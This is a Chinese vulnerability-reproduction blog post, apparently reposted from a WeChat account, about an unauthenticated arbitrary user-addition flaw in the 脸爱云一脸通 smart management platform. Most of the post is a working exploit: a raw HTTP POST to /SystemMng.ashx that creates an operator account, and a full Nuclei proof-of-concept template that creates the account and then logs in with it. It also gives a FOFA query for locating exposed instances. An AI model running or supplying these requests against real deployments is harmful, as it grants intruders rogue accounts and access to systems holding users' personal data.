「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

admin

138484
文章

114
评论

2023年11月24日12:39:04评论68 views字数 2596阅读8分39秒阅读模式

免责声明

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

此内容仅供技术交流与学习，请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任，与本文作者及发布平台无关。如有内容争议或侵权，请及时联系我们。谢谢！

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

漏洞概述

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

脸爱云一脸通智慧管理平台存在严重漏洞，允许攻击者通过未经授权的访问，在系统中任意添加用户。攻击者可滥用此漏洞创建虚假账户，提升权限，或执行其他危险操作。成功利用漏洞可能导致未经授权的系统访问，危及用户隐私和整体系统安全。为确保系统安全，强烈建议立即修复漏洞，加强用户添加功能的输入验证和访问控制，以限制仅授权用户能够执行此操作。

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

漏洞复现

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

POST /SystemMng.ashx HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23yUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 175
operatorName=test1&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

NUCLEI POC

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

id: lianaiyun-yiliantong-SystemMng-useraddinfo:  name: 脸爱云 一脸通智慧管理平台任意用户添加漏洞  author: rain  severity: high  description: |    脸爱云 一脸通智慧管理平台存在严重漏洞，允许攻击者通过未经授权的访问，在系统中任意添加用户。攻击者可滥用此漏洞创建虚假账户，提升权限，或执行其他危险操作。成功利用漏洞可能导致未经授权的系统访问，危及用户隐私和整体系统安全。为确保系统安全，强烈建议立即修复漏洞，加强用户添加功能的输入验证和访问控制，以限制仅授权用户能够执行此操作。  metadata:    fofa-query: title=="欢迎使用脸爱云 一脸通智慧管理平台"
http:  - raw:      - |         POST /SystemMng.ashx HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close        Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23y        Upgrade-Insecure-Requests: 1        Content-Type: application/x-www-form-urlencoded        Content-Length: 175
        operatorName=test1&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators      - |         POST /SystemMng.ashx HTTP/1.1        Host: {{Hostname}}        Cookie: uName=rs6NHOsENwI=; ASP.NET_SessionId=vc0efscjhrtrwr2a5rsdugbr        Accept-Language: zh-CN,zh;q=0.9        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36        Accept: */*        sec-ch-ua: "Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24"        sec-ch-ua-mobile: ?0        Content-Type: application/x-www-form-urlencoded; charset=UTF-8        X-Requested-With: XMLHttpRequest        sec-ch-ua-platform: "Windows"        Accept-Encoding: gzip, deflate        Content-Length: 48
        name=test1&pwd=123456&keeps=0&funcName=UserLogin    matchers:      - type: dsl        dsl:          - 'status_code==200 && contains_all(body_2,"1")'

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

原文始发于微信公众号（知黑守白）：「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

「漏洞复现」脸爱云一脸通智慧管理平台任意用户添加

Next.js中间件权限绕过漏洞 CVE-2025-29927

CrushFTP新安全漏洞：未授权访问和CVE-2025-31161

Langflow code接口存在远程代码执行漏洞CVE-2025-3248 附POC

nextjs中间件权限绕过漏洞（CVE-2025-29927）

Vite import存在任意文件读取漏洞CVE-2025-31125 附POC

CVE-2025-22457

elestio memos SSRF漏洞 (CVE-2025-22952)

Zyxel-NBG2105-身份验证绕过（CVE-2021-3297）

Zyxel-NBG2105-身份验证绕过-CVE-2021-3297

H3C多系列路由器存在任意用户登录漏洞 POC

发表评论

在线咨询

微信